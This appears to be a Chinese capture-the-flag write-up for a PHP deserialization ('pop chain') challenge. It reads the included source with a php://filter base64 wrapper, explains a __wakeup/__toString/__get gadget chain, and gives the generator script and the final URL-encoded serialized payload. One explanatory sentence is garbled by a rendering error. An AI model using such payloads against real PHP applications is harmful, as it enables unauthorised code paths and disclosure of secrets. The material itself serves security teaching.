pop链
题目
<?php
error_reporting(0);
include("./try.php");
if(isset($_GET['fn'])){
if(check_fn($_GET['fn'])){
include($_GET['fn']);
}
}else{
unserialize($_GET['code']);
}
highlight_file(__FILE__);
?>
题目中包含是try.php文件,所以我们考虑去读取他,
使用PHP://filter 伪协议
php://filter/read=convert.base64-encode/resource=try.php
try.php 文件
<?php
$test = "Hello world";
include "flag.php";
function check_fn($filename){
$result = preg_match("/string|zlib|flag/i", $filename);
if($result){
return FALSE;
}
return TRUE;
}
class agood {
private $gooda;
public function __construct($file){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
function __wakeup(){
$temp = $this->gooda . 'ctf';
}
}
class bgood {
private $items = array();
public function __toString() {
$item = $this->items;
$str = $item['ss']->sword;
return 'what the good?';
}
}
class cgood {
private $params = array();
public function __get($key) {
global $flag;
$tmp = $this->params[$key];
var_dump($$tmp);
}
}
?>
__wakeup():是调用反序列化是会触发,(绕过方法:使用序列化时将其中的变量数量与真实数量不符)
__toString():把类当作字符串使用时触发
__get:从不可访问的属性中读取数据会触发
解题思路:
首先对code进行传参使他执行反序列化触发__wakeup,执行过程中会将agood类里面的变量 g o o d a 与 字 符 串 拼 接 ( 将 gooda与字符串拼接(将 gooda与字符串拼接(将gooda当成的字符串),就触发了bgood类里面的__toString 方法,会调用数组中的ss键(KaTeX parse error: Expected group after '_' at position 35: …访问,于是执行了cgood中的_̲_get方法,获得key的值,将数组里面key键对应的值赋值个tmp变量params[$key],最后是一个变量覆盖,构造tmp=flag,就可以将flag的值覆盖
<?php
class agood{
private $gooda;
function __construct()
{
$this->gooda = new bgood();
}
}
class bgood{
private $items = array();
function __construct(){
$this->items = array("ss"=>new cgood());
}
}
class cgood{
private $params = array("sword"=>"flag");
}
echo serialize(new agood());
?>
O:5:"agood":1:{s:12:"agoodgooda";O:5:"bgood":1:{s:12:"bgooditems";a:1:{s:2:"ss";O:5:"cgood":1:{s:13:"cgoodparams";a:1:{s:5:"sword";s:4:"flag";}}}}}
由于变量都是私有的,所以需要在变量名之前加上%00类名%00
这里我们直接输出,%00是输出不出来的,所以手动加上
O:5:%22agood%22:1:{s:12:%22%00agood%00gooda%22;O:5:%22bgood%22:1:{s:12:%22%00bgood%00items%22;a:1:{s:2:%22ss%22;O:5:%22cgood%22:1:{s:13:%22%00cgood%00params%22;a:1:{s:5:%22sword%22;s:4:%22flag%22;}}}}}